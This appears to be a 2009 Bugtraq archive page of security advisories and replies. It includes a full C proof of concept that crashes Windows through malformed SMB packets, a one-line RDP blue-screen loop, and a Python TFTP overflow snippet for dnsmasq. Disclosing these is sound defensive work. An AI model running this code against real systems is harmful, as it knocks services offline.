RE: Re: Multiple RDP Connections BSOD DOS
Cannot reproduce, either, XP SP3. Maybe you were really low on RAM? -Original Message- From: nob...@nowhere.com [mailto:nob...@nowhere.com] Sent: Wednesday, September 09, 2009 3:29 PM To: bugtraq@securityfocus.com Subject: Re: Re: Multiple RDP Connections BSOD DOS Cannot reproduce. Windows XP SP2
Re: Multiple RDP Connections BSOD DOS
Unable to reproduce on Vista Ultimate x64-all patch levels. John Menerick www.securesql.info On Sep 8, 2009, at 11:35 AM, Tim Medin wrote: Creating multiple RDP connection at the same time causes Windows to Blue Screen. Here is the Proof of Concept code. for /L %i in (1,1,20) do mstsc /v:127.0.0.%i It does work on Windows 7 and some Vista installations. -Tim Medin NOTICE: This email and any attachments may contain confidential and proprietary information of NetSuite Inc. and is for the sole use of the intended recipient for the stated purpose. Any improper use or distribution is prohibited. If you are not the intended recipient, please notify the sender; do not review, copy or distribute; and promptly delete or destroy all transmitted information. Please note that all communications and information transmitted through this email system may be monitored by NetSuite or its agents and that all incoming email is automatically scanned by a third party spam and filtering service.
Re: Re: Multiple RDP Connections BSOD DOS
Cannot reproduce. Windows XP SP2
RE: MS09-048 includes fixes for TCP/IP implementation issues reported more than a year ago
b...@home.com wrote: > Does anyone have a reference pointing to the original announcement on > here for these vulnerabilities? I would like to research them > regarding the potential continued vulnerability of XP, since MS did > not provide a patch for XP products. CERT-FI was the coordinator for these vulnerabilities, and the CERT-FI advisory (referenced in the previous message from Juha-Matti Laurio) is the best overall announcement. Jim -- James N. Duncan, CISSP Manager, Juniper Networks Security Incident Response Team (Juniper SIRT) E-mail: jdun...@juniper.net Mobile: +1 919 608 0748 PGP key fingerprint: E09E EA55 DA28 1399 75EB D6A2 7092 9A9C 6DC3 1821
Re: Multiple RDP Connections BSOD DOS
I could not reproduce this on Vista Home Premium or Windows 7 Ultimate (different computers, both 64-bit) even with creating 200 connections. Could you provide more information on your setup? Tim Medin wrote: Creating multiple RDP connection at the same time causes Windows to Blue Screen. Here is the Proof of Concept code. for /L %i in (1,1,20) do mstsc /v:127.0.0.%i It does work on Windows 7 and some Vista installations. -Tim Medin
[ MDVSA-2009:226 ] aria2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:226 http://www.mandriva.com/security/ ___ Package : aria2 Date: September 9, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in aria2: aria2 has a buffer overflow which makes it crashing at least on mips. This update provides a solution to this vulnerability. ___ References: https://qa.mandriva.com/52840 ___ Updated Packages: Mandriva Linux 2009.0: aca5d2cf89e66c2ce9571a92d4422fdd 2009.0/i586/aria2-0.15.3-0.20080918.3.1mdv2009.0.i586.rpm 426570e80bfb4500ddfb6b614ce00b1d 2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 3ffda03aa513f64aae44c753723b6057 2009.0/x86_64/aria2-0.15.3-0.20080918.3.1mdv2009.0.x86_64.rpm 426570e80bfb4500ddfb6b614ce00b1d 2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm Mandriva Linux 2009.1: ad69905c7c6705df5e6a45c74bffef2e 2009.1/i586/aria2-1.2.0-0.20090201.3.1mdv2009.1.i586.rpm 50e2057ebaac0901d19ca7feb8063e53 2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 4b5529526d974780f65a7036424b8aa5 2009.1/x86_64/aria2-1.2.0-0.20090201.3.1mdv2009.1.x86_64.rpm 50e2057ebaac0901d19ca7feb8063e53 2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm Mandriva Enterprise Server 5: 3d6e5be8530d12ffd36e9e643a4e4538 mes5/i586/aria2-0.15.3-0.20080918.3.1mdvmes5.i586.rpm 5ffa73ba78d44cf0c61dda3042e23d00 mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: bc874285d1ded702bded3e04767e9aa6 mes5/x86_64/aria2-0.15.3-0.20080918.3.1mdvmes5.x86_64.rpm 5ffa73ba78d44cf0c61dda3042e23d00 mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKp7sWmqjQ0CJFipgRAnWVAJ9NTr/fWkV54mK2oW+YPvIP9cL3ZwCcCDm9 LSL0lhYX2+XU0QijJNzojuo= =SGvN -END PGP SIGNATURE-
CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server 1. *Advisory Information* Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server Advisory ID: CORE-2009-0820 Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities Date published: 2009-08-31 Date of last update: 2009-08-31 Vendors contacted: Simon Kelley Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 36120, 36121 CVE Name: CVE-2009-2957, CVE-2009-2958 3. *Vulnerability Description* Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability has been found that may allow an attacker to execute arbitrary code on servers or home routers running dnsmasq[1] with the TFTP service[2][3] enabled ('--enable-tfp'). This service is not enabled by default on most distributions; in particular it is not enabled by default on OpenWRT or DD-WRT. Chances of successful exploitation increase when a long directory prefix is used for TFTP. Code will be executed with the privileges of the user running dnsmasq, which is normally a non-privileged one. Additionally there is a potential DoS attack to the TFTP service by exploiting a null-pointer dereference vulnerability. 4. *Vulnerable packages* . dnsmasq 2.40. . dnsmasq 2.41. . dnsmasq 2.42. . dnsmasq 2.43. . dnsmasq 2.44. . dnsmasq 2.45. . dnsmasq 2.46. . dnsmasq 2.47. . dnsmasq 2.48. . dnsmasq 2.49. . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . dnsmasq 2.50 6. *Vendor Information, Solutions and Workarounds* If the TFTP service is enabled and patching is not available immediately, a valid workaround is to filter TFTP for untrusted hosts in the network (such as the Internet). This is the default configuration when enabling TFTP on most home routers. Patches are already available from the software author. Most distributions should release updates for binary packages soon. 7. *Credits* The heap-overflow vulnerability (CVE-2009-2957) was discovered during Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los Herederos de Don Pablo" of Core Security Technologies. The null-pointer dereference (CVE-2009-2958) was reported to the author of dnsmasq independently by an uncredited code auditor. It was merged with this advisory for user's convenience. 8. *Technical Description* 8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)* First let's focus on the overflow vulnerability. The 'tftp_request' calls 'strncat' on 'daemon->namebuff', which has a predefined size of 'MAXDNAME' bytes (defaulting to 1025). /--- else if (filename[0] == '/') daemon->namebuff[0] = 0; strncat(daemon->namebuff, filename, MAXDNAME); - ---/ This may cause a heap overflow because 'daemon->namebuff' may already contain data, namely the configured 'daemon->tftp_prefix' passed to the daemon via a configuration file. /--- if (daemon->tftp_prefix) { if (daemon->tftp_prefix[0] == '/') daemon->namebuff[0] = 0; strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME) - ---/ The default prefix is '/var/tftpd', but if a longer prefix is used, arbitrary code execution may be possible. Sending the string resulting from the execution of the following python snippet to a vulnerable server, with a long enough directory prefix configured, should crash the daemon. /--- import sys sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' ) - ---/ 8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)* Now onto the null-pointer dereference. The user can crash the service by handcrafting a packet, because of a problem on the guard of the first if inside this code loop: /--- while ((opt = next(&p, end))) { if (strcasecmp(opt, "blksize") == 0 && (opt = next(&p, end)) && !(daemon->options & OPT_TFTP_NOBLOCK)) { transfer->blocksize = atoi(opt); if (transfer->blocksize < 1) transfer->blocksize = 1; if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4) transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4; transfer->opt_blocksize = 1; transfer->block = 0; } if (strcasecmp(opt, "tsize") == 0 && next(&p, end) && !transfer->netascii) { transfer->opt_transize = 1; transfer->block = 0; } } - ---/ The problem exists because the guard of the first if includes the result of 'opt = next(&p, end)' as part of the check. If this returns 'NULL', the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will derrefence the null-pointer. 9. *Report Timeline* . 2009-08-20: Core Security Technologies no
SMB SRV2.SYS Denial of Service PoC
/* * * SMB SRV2.SYS Denial of Service PoC * Release Date: Sep 8, 2009 * Severity: Medium/High * Systems Affected: Windows Vista SP1+SP2, Windows 2008 SP2, Windows 7 Beta + RC * Discovered by: Laurent Gaffié * * Description: * SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. * The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used * to identify the SMB dialect that will be used for futher communication. * * KB: http://www.microsoft.com/technet/security/advisory/975497.mspx */ #include #include #pragma comment(lib, "WS2_32.lib") char buff[] = "\x00\x00\x00\x90" // Begin SMB header: Session message "\xff\x53\x4d\x42" // Server Component: SMB "\x72\x00\x00\x00" // Negociate Protocol "\x00\x18\x53\xc8" // Operation 0x18 & sub 0xc853 "\x00\x26" // Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00"; int main(int argc, char *argv[]) { if (argc < 2) { printf("Syntax: %s [ip address]\r\n", argv[0]); return -1; } WSADATA WSAdata; WSAStartup(MAKEWORD(2, 2), &WSAdata); SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); char *host = argv[1]; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = htons((unsigned short)445); ssin.sin_addr.s_addr = inet_addr(host); printf("Connecting to %s:445... ", host); if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) { printf("ERROR!\r\n"); return 0; } printf("OK\r\n"); printf("Sending malformed packet... "); if (send(sock, buff, sizeof(buff), 0) <= 0) { printf("ERROR!\r\n"); return 0; } printf("OK\r\n"); printf("Successfully sent packet!\r\nTarget should be crashed...\r\n"); // Close the socket closesocket(sock); WSACleanup(); return 1; }
[SECURITY] [DSA 1882-1] New xapian-omega packages fix cross-site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1882-1secur...@debian.org http://www.debian.org/security/ Nico Golde September 9th, 2009 http://www.debian.org/security/faq - -- Package: xapian-omega Vulnerability : missing input sanitization Problem type : remote Debian-specific: no CVE ID : CVE-2009-2947 It was discovered that xapian-omega, a CGI interface for searching xapian databases, is not properly escaping user supplied input when printing exceptions. An attacker can use this to conduct cross-site scripting attacks via crafted search queries resulting in an exception and steal potentially sensitive data from web applications running on the same domain or embedding the search engine into a website. For the oldstable distribution (etch), this problem has been fixed in version 0.9.9-1+etch1. For the stable distribution (lenny), this problem has been fixed in version 1.0.7-3+lenny1. For the testing (squeeze) and unstable (sid) distribution, this problem will be fixed soon. We recommend that you upgrade your xapian-omega packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1.dsc Size/MD5 checksum: 1309 5a6c3eb3466e76a5cd0195da96d646c8 http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1.diff.gz Size/MD5 checksum: 7283 fa1327788649c4b70252484298ca http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9.orig.tar.gz Size/MD5 checksum: 456940 cf2cfa2d98948ba6c5440db5e5baabc6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_alpha.deb Size/MD5 checksum: 264408 37050849b159d950718961ee8c9fc53a amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_amd64.deb Size/MD5 checksum: 243398 039ab294a191863a6f11f9461d442fdb arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_arm.deb Size/MD5 checksum: 271312 71c448519cc2952134c3c604d46e364b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_hppa.deb Size/MD5 checksum: 261640 6ec25e571ae0f72f2ce677d02f7a33c0 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_i386.deb Size/MD5 checksum: 247156 79d32ec1534b0c47306adc9e34ff7a2c ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_ia64.deb Size/MD5 checksum: 295998 0d0b0e45a813c5c3384beea87bf67d70 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_mips.deb Size/MD5 checksum: 242622 75cbb4b5d4ccb7b17ebc5e43d3964550 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_mipsel.deb Size/MD5 checksum: 242346 ea46d3fee9009a61628a40d548677579 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_powerpc.deb Size/MD5 checksum: 249362 13726168ebf17a82cde5d53b839b4921 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_s390.deb Size/MD5 checksum: 235796 1190383d3c937065802b81fae40fdaa1 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/x/xapian-omega/xapian-omega_0.9.9-1+etch1_sparc.deb Size/MD5 checksum: 242226 b7d5339d30fb2c16fcd2efe4364b36f7 Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/mai
[ GLSA 200909-11 ] GCC-XML: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GCC-XML: Insecure temporary file usage Date: September 09, 2009 Bugs: #245765 ID: 200909-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in GCC-XML allowing for symlink attacks. Background == GCC-XML is an XML output extension to the C++ front-end of GCC. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-cpp/gccxml < 0.9.0_pre20090516 >= 0.9.0_pre20090516 Description === Dmitry E. Oboukhov reported that find_flags in GCC-XML does not handle "/tmp/*.cxx" temporary files securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All GCC-XML users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-cpp/gccxml-0.9.0_pre20090516 References == [ 1 ] CVE-2008-4957 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4957 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
[ GLSA 200909-10 ] LMBench: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: LMBench: Insecure temporary file usage Date: September 09, 2009 Bugs: #246015 ID: 200909-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple insecure temporary file usage issues have been reported in LMBench, allowing for symlink attacks. Background == LMBench is a suite of simple, portable benchmarks for UNIX platforms. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-benchmarks/lmbench<= 3Vulnerable! --- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. Description === Dmitry E. Oboukhov reported that the rccs and STUFF scripts do not handle "/tmp/sdiff.#" temporary files securely. NOTE: There might be further occurances of insecure temporary file usage. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == LMBench has been removed from Portage. We recommend that users unmerge LMBench: # emerge --unmerge app-benchmarks/lmbench References == [ 1 ] CVE-2008-4968 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4968 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
[ GLSA 200909-09 ] Screenie: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Screenie: Insecure temporary file usage Date: September 09, 2009 Bugs: #250476 ID: 200909-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in Screenie, allowing for symlink attacks. Background == Screenie is a small screen frontend that is designed to be a session handler. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 app-misc/screenie < 1.30.0-r1 >= 1.30.0-r1 Description === Dmitry E. Oboukhov reported that Screenie does not handle "/tmp/.screenie.#" temporary files securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Screenie users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-misc/screenie-1.30.0-r1 References == [ 1 ] CVE-2008-5371 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5371 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
[ GLSA 200909-08 ] C* music player: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: C* music player: Insecure temporary file usage Date: September 09, 2009 Bugs: #250474 ID: 200909-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in the C* music player, allowing for symlink attacks. Background == The C* Music Player (cmus) is a modular and very configurable ncurses-based audio player. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/cmus < 2.2.0-r1 >= 2.2.0-r1 Description === Dmitry E. Oboukhov reported that cmus-status-display does not handle the "/tmp/cmus-status" temporary file securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All C* music player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-sound/cmus-2.2.0-r1 References == [ 1 ] CVE-2008-5375 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5375 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Re: MS09-048 includes fixes for TCP/IP implementation issues reported more than a year ago
Does anyone have a reference pointing to the original announcement on here for these vulnerabilities? I would like to research them regarding the potential continued vulnerability of XP, since MS did not provide a patch for XP products.
[ GLSA 200909-07 ] TkMan: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: TkMan: Insecure temporary file usage Date: September 09, 2009 Bugs: #247540 ID: 200909-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in TkMan, allowing for symlink attacks. Background == TkMan is a graphical, hypertext manual page and Texinfo browser for UNIX. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-text/tkman < 2.2-r1>= 2.2-r1 Description === Dmitry E. Oboukhov reported that TkMan does not handle the "/tmp/tkman#" and "/tmp/ll" temporary files securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All TkMan users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-text/tkman-2.2-r1 References == [ 1 ] CVE-2008-5137 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5137 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
[ GLSA 200909-06 ] aMule: Parameter injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: aMule: Parameter injection Date: September 09, 2009 Bugs: #268163 ID: 200909-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An input validation error in aMule enables remote attackers to pass arbitrary parameters to a victim's media player. Background == aMule is an eMule-like client for the eD2k and Kademlia networks, supporting multiple platforms. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-p2p/amule < 2.2.5 >= 2.2.5 Description === Sam Hocevar discovered that the aMule preview function does not properly sanitize file names. Impact == A remote attacker could entice a user to download a file with a specially crafted file name to inject arbitrary arguments to the victim's video player. Workaround == There is no known workaround at this time. Resolution == All aMule users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-p2p/amule-2.2.5 References == [ 1 ] CVE-2009-1440 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1440 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
[ GLSA 200909-05 ] Openswan: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Openswan: Denial of Service Date: September 09, 2009 Bugs: #264346, #275233 ID: 200909-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in the pluto IKE daemon of Openswan might allow remote attackers to cause a Denial of Service. Background == Openswan is an implementation of IPsec for Linux. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/openswan < 2.4.15 >= 2.4.15 Description === Multiple vulnerabilities have been discovered in Openswan: * Gerd v. Egidy reported a NULL pointer dereference in the Dead Peer Detection of the pluto IKE daemon as included in Openswan (CVE-2009-0790). * The Orange Labs vulnerability research team discovered multiple vulnerabilities in the ASN.1 parser (CVE-2009-2185). Impact == A remote attacker could exploit these vulnerabilities by sending specially crafted R_U_THERE or R_U_THERE_ACK packets, or a specially crafted X.509 certificate containing a malicious Relative Distinguished Name (RDN), UTCTIME string or GENERALIZEDTIME string to cause a Denial of Service of the pluto IKE daemon. Workaround == There is no known workaround at this time. Resolution == All Openswan users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/openswan-2.4.15 References == [ 1 ] CVE-2009-0790 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0790 [ 2 ] CVE-2009-2185 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2185 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
4f: The File Format Fuzzing Framework
